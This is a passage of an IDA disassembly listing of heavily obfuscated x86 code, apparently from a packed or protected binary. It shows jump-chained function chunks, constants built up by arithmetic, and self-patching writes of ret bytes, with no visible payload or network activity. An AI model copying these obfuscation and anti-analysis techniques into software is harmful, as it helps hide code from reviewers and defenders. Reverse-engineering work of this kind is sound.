jmp loc_442716
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
shl eax, 5
jmp sub_45458B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_44D64E: ; CODE XREF: sub_4442CC:loc_44FC4Ej
rol eax, 15h
xor eax, 59435531h
jmp loc_452A55
; END OF FUNCTION CHUNK FOR sub_4442CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459B58
loc_44D65C: ; CODE XREF: sub_459B58j
mov eax, ds:dword_44631C
or eax, eax
jnz loc_44083A
jmp loc_43D08C
; END OF FUNCTION CHUNK FOR sub_459B58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BC1B
loc_44D66F: ; CODE XREF: sub_43BC1B+9j
mov ds:off_41D150, eax
lea eax, sub_446215
mov byte ptr [eax], 0C3h
jmp loc_45A8FD
; END OF FUNCTION CHUNK FOR sub_43BC1B
; =============== S U B R O U T I N E =======================================
sub_44D683 proc near ; CODE XREF: sub_406214+77p
; sub_4062C4+52p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043A32B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EE00 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004469CD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A401 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044D895 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045AC4C SIZE 0000000D BYTES
push esi
push 0B05DE69Ah
pop esi
xor esi, 10481CD8h
add esi, 602DF3A9h
jmp loc_44D895
sub_44D683 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_44D69B: ; CODE XREF: sub_455145+7j
and ecx, 0AC62943Ch
rol ecx, 13h
test ecx, 200000h
jmp loc_44CF67
; END OF FUNCTION CHUNK FOR sub_455145
; ---------------------------------------------------------------------------
loc_44D6AF: ; CODE XREF: ut7h7i2x:loc_43AFD6j
jl loc_455ED7
; START OF FUNCTION CHUNK FOR sub_445BA6
loc_44D6B5: ; CODE XREF: sub_445BA6+Cj
jmp nullsub_286
; END OF FUNCTION CHUNK FOR sub_445BA6
; ---------------------------------------------------------------------------
loc_44D6BA: ; CODE XREF: ut7h7i2x:0043A5BBj
jmp nullsub_78
; ---------------------------------------------------------------------------
or esi, 66B2964Eh
jmp loc_455ED3
; ---------------------------------------------------------------------------
mov ds:off_41D000, eax
lea eax, loc_442B2C
mov byte ptr [eax], 0C3h
jmp loc_456884
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C66
loc_44D6DE: ; CODE XREF: sub_452C66:loc_442B2Cj
pop edx
mov eax, [esp-4+arg_0]
push edx
call sub_457A66
mov eax, 0CE14EFFFh
jmp loc_44BAA9
; END OF FUNCTION CHUNK FOR sub_452C66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ADDB
loc_44D6F2: ; CODE XREF: sub_43ADDB:loc_456C70j
cmp esi, 1D770E2Ah
jmp loc_442230
; END OF FUNCTION CHUNK FOR sub_43ADDB
; =============== S U B R O U T I N E =======================================
sub_44D6FD proc near ; CODE XREF: ut7h7i2x:0043D6E2j
; ut7h7i2x:00456AB1p
; FUNCTION CHUNK AT 0044C670 SIZE 0000001D BYTES
xchg ebx, [esp+0]
pop ebx
call sub_4439B0
mov eax, 86480F55h
push eax
jmp loc_44C670
sub_44D6FD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B513
loc_44D711: ; CODE XREF: sub_43B513+17EA5j
push 2AB9E13h
jmp loc_43E41C
; END OF FUNCTION CHUNK FOR sub_43B513
; ---------------------------------------------------------------------------
push ebx
push 1E8EABF9h
loc_44D721: ; CODE XREF: ut7h7i2x:loc_43CDA8j
pop ebx
sub ebx, 70AA9F93h
add ebx, 2E0F0E2Fh
and ebx, 49DE2EBh
add ebx, 0FFB0CE7Fh
mov [ebx], eax
jmp loc_43DDAE
; ---------------------------------------------------------------------------
cdq
jmp sub_43DCFF
; ---------------------------------------------------------------------------
loc_44D747: ; CODE XREF: ut7h7i2x:00441C06j
mov [edx], eax
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_44D749: ; CODE XREF: sub_44A3BB:loc_441BF9j
rol eax, 0Bh
test eax, 8
jmp loc_45A713
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
loc_44D757: ; CODE XREF: ut7h7i2x:0043F7E6j
xchg ebp, [edx]
; =============== S U B R O U T I N E =======================================
sub_44D759 proc near ; CODE XREF: sub_43CCC3+1BF6Fp
; FUNCTION CHUNK AT 0043A16F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DEEA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00444ACC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004473CE SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add eax, 30BDF574h
mov eax, [eax]
pushf
push 0CFFE99C3h
pop edx
jmp loc_43A16F
sub_44D759 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_455. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44D772: ; CODE XREF: sub_43AB62+88B4j
jmp loc_44EF96
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
jmp loc_446104
; ---------------------------------------------------------------------------
loc_44D77C: ; CODE XREF: ut7h7i2x:00447A80j
pop eax
; =============== S U B R O U T I N E =======================================
sub_44D77D proc near ; CODE XREF: ut7h7i2x:004504FEp
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00439BF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A55A SIZE 0000001C BYTES
xchg edx, [esp+0]
pop edx
popf
xchg ecx, [esp-8+arg_4]
push edx
pushf
jmp loc_439BF3
sub_44D77D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44D78C: ; CODE XREF: sub_43A556+C4DBj
xor eax, esi
loc_44D78E: ; CODE XREF: sub_43A556:loc_43AC48j
push 0
push 0
push 10h
mov eax, [ebp-8]
jmp loc_43F902
; END OF FUNCTION CHUNK FOR sub_43A556
; =============== S U B R O U T I N E =======================================
sub_44D79C proc near ; CODE XREF: sub_43FF65:loc_44DE17j
var_24 = dword ptr -24h
; FUNCTION CHUNK AT 0043BA6F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E84C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F722 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00440746 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444931 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446CF1 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00450AB1 SIZE 0000001A BYTES
add esp, 0FFFFFFE0h
push 0D436F46Ch
xchg edi, [esp+24h+var_24]
jmp loc_43E84C
sub_44D79C endp
; =============== S U B R O U T I N E =======================================
sub_44D7AC proc near ; CODE XREF: ut7h7i2x:00440990j
; sub_4523CA+86BCp
xchg edx, [esp+0]
pop edx
xor eax, 0FD4975E5h
add eax, ebp
add eax, 0A6A6C381h
mov eax, [eax]
mov eax, [eax+60h]
jmp loc_43E76C
sub_44D7AC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44D7C8: ; CODE XREF: sub_442B3B+94j
sub eax, 1BCB76FEh
and eax, 0C8332EFh
xor eax, 40022E2h
call sub_4448AF
jmp loc_43A90D
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
locret_44D7E4: ; CODE XREF: ut7h7i2x:00453664j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4523B3
loc_44D7E5: ; CODE XREF: sub_4523B3:loc_4486F9j
jmp loc_43CB77
; END OF FUNCTION CHUNK FOR sub_4523B3
; ---------------------------------------------------------------------------
loc_44D7EA: ; CODE XREF: ut7h7i2x:004591D0j
call nullsub_492
jmp loc_4528D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_44D7F4: ; CODE XREF: sub_457A66-18B5Aj
jo loc_459DBC
sub al, 99h
push 99ED9E49h
pop edx
jmp loc_4440AC
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
sub_44D807 proc near ; CODE XREF: ut7h7i2x:0044885Dj
; sub_44D1F0-E75p
; FUNCTION CHUNK AT 00458D26 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
add eax, ebp
add eax, 59BE6FF8h
mov eax, [eax]
popf
call sub_440B68
loc_44D81B: ; DATA XREF: sub_440FC3+FA47o
call sub_456520
mov eax, 3CC6743Ch
call sub_43AA94
mov ds:off_41D09C, eax
loc_44D830: ; CODE XREF: sub_439354j
lea eax, loc_454E5A
mov byte ptr [eax], 0C3h
jmp loc_458D26
sub_44D807 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call nullsub_538
jmp loc_4470E5
; =============== S U B R O U T I N E =======================================
sub_44D848 proc near ; CODE XREF: sub_440B68-5B0Fp
; ut7h7i2x:00442411j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00455DF5 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
add edx, 0CBDD41EAh
xchg edx, [esp-4+arg_0]
jmp loc_455DF5
sub_44D848 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_44D85A: ; CODE XREF: ut7h7i2x:0043CDF1j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_44D85B: ; CODE XREF: sub_449D3B:loc_43A58Aj
xor edx, 3C747582h
or edx, 99CE9224h
call sub_44D066
loc_44D86C: ; CODE XREF: sub_44D8E8+6j
jmp nullsub_98
; END OF FUNCTION CHUNK FOR sub_449D3B
; ---------------------------------------------------------------------------
push 0F5A884DDh
pop eax
rol eax, 7
add eax, 6CAB769Bh
jmp loc_4550CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A65
loc_44D885: ; CODE XREF: sub_443A65:loc_43F660j
; ut7h7i2x:loc_4451B9j
pop ecx
mov eax, [esp-8+arg_4]
push edi
mov edi, edx
xchg edi, [esp-4+arg_0]
; END OF FUNCTION CHUNK FOR sub_443A65
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_44D88F: ; CODE XREF: sub_452D3D:loc_456912j
push edx
jmp loc_456DF2
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D683
loc_44D895: ; CODE XREF: sub_44D683+13j
xchg esi, [esp+0]
jmp loc_43EE00
; END OF FUNCTION CHUNK FOR sub_44D683
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_44D89D: ; CODE XREF: sub_4408C2:loc_44CEF0j
; sub_4408C2+12951j
push offset sub_439AFD
jmp loc_44A014
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C068
loc_44D8A7: ; CODE XREF: sub_44C068+7j
push offset loc_44463D
jmp nullsub_100
; END OF FUNCTION CHUNK FOR sub_44C068
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CA4
loc_44D8B1: ; CODE XREF: sub_458CA4:loc_458755j
add edx, 0F5176EF5h
add edx, ebp
add edx, 0E6ED240Eh
mov edx, [edx]
call sub_45983B
loc_44D8C6: ; CODE XREF: sub_448D37+Dj
cmp dword ptr [ebp-4], 0
jz loc_44A5B7
jmp loc_44676F
; END OF FUNCTION CHUNK FOR sub_458CA4
; ---------------------------------------------------------------------------
test ebp, ebx
jmp loc_43CD29
; ---------------------------------------------------------------------------
mov ecx, eax
jmp loc_4447B6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_44D8E3: ; CODE XREF: sub_447CBE-1093j
mov ecx, edi
pop edi
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_447CBE
; =============== S U B R O U T I N E =======================================
sub_44D8E8 proc near ; CODE XREF: sub_44682E:loc_43DC88p
; ut7h7i2x:00446349p ...
push ebp
loc_44D8E9: ; CODE XREF: ut7h7i2x:loc_45A836j
push offset loc_44B167
jmp loc_44D86C
sub_44D8E8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44D8F3: ; CODE XREF: sub_43A556:loc_44B63Fj
lea eax, nullsub_16
mov byte ptr [eax], 0C3h
jmp loc_448A36
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_44D901: ; CODE XREF: ut7h7i2x:00453A17j
xchg ecx, [esp]
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_44D904: ; CODE XREF: sub_44BF76:loc_45A7D0j
push ecx
pop edx
pop ecx
mov eax, [esp-8+arg_4]
push edx
jmp loc_458C20
; END OF FUNCTION CHUNK FOR sub_44BF76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445188
loc_44D910: ; CODE XREF: sub_445188:loc_44D989j
jnz loc_4524D1
jmp loc_441358
; END OF FUNCTION CHUNK FOR sub_445188
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_44D91B: ; CODE XREF: sub_449E96-7D72j
jz loc_4554E0
jmp loc_45AC22
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
loc_44D926: ; CODE XREF: ut7h7i2x:00442D57j
jl loc_44B8ED
xchg ecx, [ebp+0]
and eax, 21D276Eh
loc_44D935: ; CODE XREF: ut7h7i2x:00442D50j
xor ecx, 46046489h
add edx, ecx
pop ecx
jmp loc_43CB4B
; ---------------------------------------------------------------------------
or ebx, 3FA5CE36h
jmp sub_445FA9
; ---------------------------------------------------------------------------
loc_44D94E: ; CODE XREF: ut7h7i2x:loc_447587j
push 0F3893AEFh
pop eax
xor eax, 3D45E66Bh
add eax, 0A1E91F0Ch
jmp loc_43D0CC
; ---------------------------------------------------------------------------
loc_44D965: ; CODE XREF: ut7h7i2x:loc_442F0Aj
sub ecx, ebx
and edi, 0EF45AF43h
jmp loc_448B05
; ---------------------------------------------------------------------------
loc_44D972: ; CODE XREF: ut7h7i2x:loc_442DB3j
call sub_43AA94
push esi
mov esi, edx
xchg esi, [esp]
push 6C752C18h
jmp loc_44DEC1
; ---------------------------------------------------------------------------
loc_44D987: ; DATA XREF: sub_449B8E+D158o
push eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445188
loc_44D989: ; CODE XREF: sub_445188+15721j
jmp loc_44D910
; END OF FUNCTION CHUNK FOR sub_445188
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AA33
loc_44D98E: ; CODE XREF: sub_44AA33+4ECEj
jmp loc_43AF06
; END OF FUNCTION CHUNK FOR sub_44AA33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456397
loc_44D993: ; CODE XREF: sub_456397-D52Bj
jmp sub_43C1D2
; END OF FUNCTION CHUNK FOR sub_456397
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44D998 proc near ; CODE XREF: sub_439B58+11C5Ep
; FUNCTION CHUNK AT 0043EA89 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00453FF6 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jmp loc_43EA89
sub_44D998 endp
; =============== S U B R O U T I N E =======================================
sub_44D9A0 proc near ; DATA XREF: sub_43BE93:loc_449350o
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push offset loc_451251
jmp nullsub_101
sub_44D9A0 endp
; =============== S U B R O U T I N E =======================================
sub_44D9B0 proc near ; DATA XREF: sub_447F8A:loc_448D06o
mov eax, [ebp-8]
pop ecx
pop ecx
pop ebp
jmp nullsub_158
sub_44D9B0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439170
loc_44D9BB: ; CODE XREF: sub_439170+15831j
add ecx, 4A508085h
mov [ecx], eax
loc_44D9C3: ; CODE XREF: ut7h7i2x:00452ACCj
xchg edx, [esp+0]
push offset sub_454FE6
jmp loc_4530A8
; END OF FUNCTION CHUNK FOR sub_439170
; ---------------------------------------------------------------------------
loc_44D9D0: ; DATA XREF: sub_4463D6:loc_43E910o
pop edx
mov eax, [esp]
push eax
mov eax, edx
xchg eax, [esp]
call sub_441EC6
jmp loc_43D858
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459070
loc_44D9E4: ; CODE XREF: sub_459070:loc_43E723j
; sub_459070-16C33j
mov eax, [ebp-18h]
mov eax, [eax]
shl eax, 3
push esi
push 0E3866DEDh
pop esi
xor esi, 69F0B863h
and esi, 0F1F8968Ch
jmp loc_43E4A3
; END OF FUNCTION CHUNK FOR sub_459070
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44DA04: ; CODE XREF: sub_43A556+FEECj
; sub_43A556:loc_456F5Aj
lea eax, [ebp-2BBh]
cmp dword ptr [eax], 47424454h
jz loc_456EB1
jmp loc_44FF11
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44DA1B: ; CODE XREF: sub_43AA94+9215j
jz loc_445996
jmp loc_459065
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
loc_44DA26: ; CODE XREF: ut7h7i2x:00444962j
jz loc_43EBBA
jmp loc_44C32A
; ---------------------------------------------------------------------------
push offset sub_43E700
jmp loc_4458BC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44DA3B proc near ; DATA XREF: sub_43F117+6o
push ebp
mov ebp, esp
push ecx
push offset loc_458A4B
jmp nullsub_195
sub_44DA3B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_44DA49: ; CODE XREF: sub_444EAA:loc_4481F8j
pop edi
xor edi, 840B21BCh
cmp edi, 0ABD66767h
jmp loc_43E399
; END OF FUNCTION CHUNK FOR sub_444EAA
; =============== S U B R O U T I N E =======================================
sub_44DA5B proc near ; CODE XREF: ut7h7i2x:0044167Fj
; ut7h7i2x:loc_454DC5p
; FUNCTION CHUNK AT 0045A91E SIZE 00000008 BYTES
xchg eax, [esp+0]
pop eax
pop edx
lea eax, sub_4596E5
jmp loc_45A91E
sub_44DA5B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_44DA6B: ; CODE XREF: sub_457A66-8913j
jnp loc_4445A5
loc_44DA71: ; CODE XREF: sub_457A66:loc_44E46Bj
mov eax, [ebp+var_4]
cmp byte ptr [eax], 0F1h
jnz loc_440D39
jmp loc_452F23
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
loc_44DA82: ; CODE XREF: ut7h7i2x:loc_43ACE9j
mov ecx, 9D45F19Fh
mov ebp, edi
jmp loc_45A21F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_44DA8E: ; CODE XREF: sub_446320+12607j
xor edi, 69035E5h
test edx, 46B90FD7h
jmp loc_449D41
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_44DA9F: ; CODE XREF: sub_448321+1j
jb loc_44F3E8
mov eax, [esp+4+var_4]
push edx
nop
mov eax, 2867838Ah
jmp loc_4503EF
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
loc_44DAB4: ; CODE XREF: ut7h7i2x:0044D54Bj
jnz loc_43FFFB
mov eax, [ebp-4]
inc eax
mov eax, [eax]
add eax, [ebp-4]
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_44DAC3: ; CODE XREF: sub_4544E6:loc_43F641j
add eax, 5
jmp loc_43FFEF
; END OF FUNCTION CHUNK FOR sub_4544E6
; ---------------------------------------------------------------------------
loc_44DACB: ; CODE XREF: ut7h7i2x:00441383j
add edx, ebx
or ebx, ebp
mov esi, eax
pushf
jmp loc_43994F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CBB
loc_44DAD7: ; CODE XREF: sub_458CBB+12j
test eax, 1
jmp loc_457B99
; END OF FUNCTION CHUNK FOR sub_458CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B27
loc_44DAE2: ; CODE XREF: sub_439B27:loc_45A6CBj
and esi, ebp
push edi
jmp loc_449EFE
; END OF FUNCTION CHUNK FOR sub_439B27
; ---------------------------------------------------------------------------
popf
jmp sub_453E14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_44DAF0: ; CODE XREF: sub_4431FF:loc_456F8Cj
mov byte ptr [eax+edx], 0
inc [ebp+var_4]
cmp [ebp+var_4], 100h
jnz loc_459980
jmp loc_459612
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_44DB09: ; CODE XREF: sub_44A3BB+54DBj
jl loc_4415CF
adc eax, 0D7563DDh
loc_44DB15: ; CODE XREF: sub_451900-7B72j
; sub_44A3BB:loc_455FA7j
add dword ptr [ebp-4], 8
jmp loc_44AA5F
; END OF FUNCTION CHUNK FOR sub_44A3BB
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44DB1E proc near ; CODE XREF: sub_45775B:loc_4440EDp
var_C = dword ptr -0Ch
var_6 = word ptr -6
; FUNCTION CHUNK AT 004473A2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458E22 SIZE 0000001E BYTES
push eax
mov eax, ebp
xchg eax, [esp+0]
mov ebp, esp
jmp loc_458E22
sub_44DB1E endp
; ---------------------------------------------------------------------------
loc_44DB2B: ; CODE XREF: ut7h7i2x:0043C3B2j
pushf
pop edi
jmp loc_44BB5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44DB32: ; CODE XREF: sub_43AA94:loc_43B56Dj
; sub_43C1E5+12j ...
mov dword ptr [ebp-8], 1
jmp loc_4582FB
; END OF FUNCTION CHUNK FOR sub_43AA94
; =============== S U B R O U T I N E =======================================
sub_44DB3E proc near ; CODE XREF: ut7h7i2x:0043EAA5p
; sub_44865D+4p ...
push offset loc_44BD9B
jmp nullsub_103
sub_44DB3E endp
; =============== S U B R O U T I N E =======================================
sub_44DB48 proc near ; DATA XREF: sub_4448AF+1114Bo
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043C448 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EB7F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F56B SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0043FD9C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004436B2 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004449D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445063 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00448151 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A1E6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C1CD SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044D57B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00452C0B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004532EE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004537AC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00459120 SIZE 00000005 BYTES
mov eax, ds:dword_44665C
or eax, eax
jnz loc_4532EE
jmp loc_44A1E6
sub_44DB48 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4447C9
loc_44DB5B: ; CODE XREF: sub_4447C9+115ACj
push 0FFFFCD26h
jmp loc_455B19
; END OF FUNCTION CHUNK FOR sub_4447C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_44DB65: ; CODE XREF: sub_443BC5+7478j
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_455B19
jmp loc_44E6CA
; END OF FUNCTION CHUNK FOR sub_443BC5
; =============== S U B R O U T I N E =======================================
sub_44DB79 proc near ; CODE XREF: sub_43F7A5:loc_447468p
; ut7h7i2x:004480DEj
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
xchg ecx, [esp-4+arg_0]
jmp sub_43C98B
sub_44DB79 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449231
loc_44DB85: ; CODE XREF: sub_449231:loc_449372j
or edx, 3D05AFF3h
sub edx, 0F7D9126Ah
xor edx, ds:4000F8h
add edx, 8CCD0A96h
mov [edx], eax
loc_44DB9F: ; CODE XREF: sub_452B14:loc_43E896j
pop edx
jmp loc_4461A5
; END OF FUNCTION CHUNK FOR sub_449231
; =============== S U B R O U T I N E =======================================
sub_44DBA5 proc near ; CODE XREF: sub_4587DDj
push ebp
push offset loc_44DC47
jmp nullsub_345
sub_44DBA5 endp
; ---------------------------------------------------------------------------
loc_44DBB0: ; CODE XREF: ut7h7i2x:004468DCj
jle loc_459325
add esi, 5176AF96h
jmp loc_4510C6
; ---------------------------------------------------------------------------
jmp ds:dword_41D068
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4523B3
loc_44DBC7: ; CODE XREF: sub_4523B3+12j
jmp loc_44CDAD
; END OF FUNCTION CHUNK FOR sub_4523B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443C4A
loc_44DBCC: ; CODE XREF: sub_443C4A:loc_451617j
jmp loc_441A6D
; END OF FUNCTION CHUNK FOR sub_443C4A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_15. PRESS KEYPAD "+" TO EXPAND]
dw 4137h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_44DBD6: ; CODE XREF: ut7h7i2x:00459B3Aj
jmp locret_457024
; ---------------------------------------------------------------------------
loc_44DBDB: ; CODE XREF: ut7h7i2x:0043D0E0j
jmp loc_43E670
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44DBE0: ; CODE XREF: sub_43AB62:loc_454BDBj
jz loc_4592FE
jmp loc_43DB15
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
not edi
jmp sub_447939
; ---------------------------------------------------------------------------
mov eax, 19CFC62Bh
call sub_43AA94
push edx
push 7CDED70Dh
jmp loc_452241
; ---------------------------------------------------------------------------
loc_44DC07: ; CODE XREF: ut7h7i2x:0044997Cj
ja loc_43EDBA
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_44DC0D: ; CODE XREF: sub_447CBE-A471j
cmp esi, ebx
jmp loc_43F2C7
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
mov eax, [esp]
push esi
push 2206274Eh
xchg edi, [esp]
mov esi, edi
jmp loc_441FB9
; ---------------------------------------------------------------------------
shl ebx, 1Ch
not ecx
jmp sub_44A35A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C273
loc_44DC31: ; CODE XREF: sub_44C273-F6C5j
; sub_452D3D-79F8j
jz loc_451FD7
jmp loc_442664
; END OF FUNCTION CHUNK FOR sub_44C273
; ---------------------------------------------------------------------------
cmp esi, 0C91DF6C4h
jmp loc_455B4B
; ---------------------------------------------------------------------------
loc_44DC47: ; DATA XREF: sub_44DBA5+1o
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:dword_43AF9C, 0
jnz loc_43E5C6
jmp loc_44B553
; ---------------------------------------------------------------------------
or ebp, eax
jmp sub_43E68B
; ---------------------------------------------------------------------------
loc_44DC65: ; CODE XREF: ut7h7i2x:loc_4426A7j
mov [ebx], eax
pop ebx
mov eax, [ebp-4]
mov al, [eax]
jmp loc_45930B
; =============== S U B R O U T I N E =======================================
sub_44DC72 proc near ; CODE XREF: ut7h7i2x:0043BF9Ej
; sub_451F39+Dp
xchg eax, [esp+0]
pop eax
lea eax, [ebp-70h]
push ebx
loc_44DC7A: ; CODE XREF: ut7h7i2x:loc_43D8EFj
mov ebx, eax
xchg ebx, [esp+0]
jmp loc_449716
sub_44DC72 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_44DC84: ; CODE XREF: sub_44EC11:loc_43B58Ej
push 0CBB82F80h
jmp loc_43E354
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
sbb edi, 0A088FE13h
jmp loc_43B5D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_44DC99: ; CODE XREF: sub_44EC11:loc_43E354j
pop eax
and eax, 844AC6B2h
test eax, 100h
jmp loc_448774
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4506D3
loc_44DCAB: ; CODE XREF: sub_4506D3:loc_454694j
; sub_4506D3+3FD0j
and ebx, 7447AB9Dh
test ebx, 10000000h
jmp loc_44442F
; END OF FUNCTION CHUNK FOR sub_4506D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
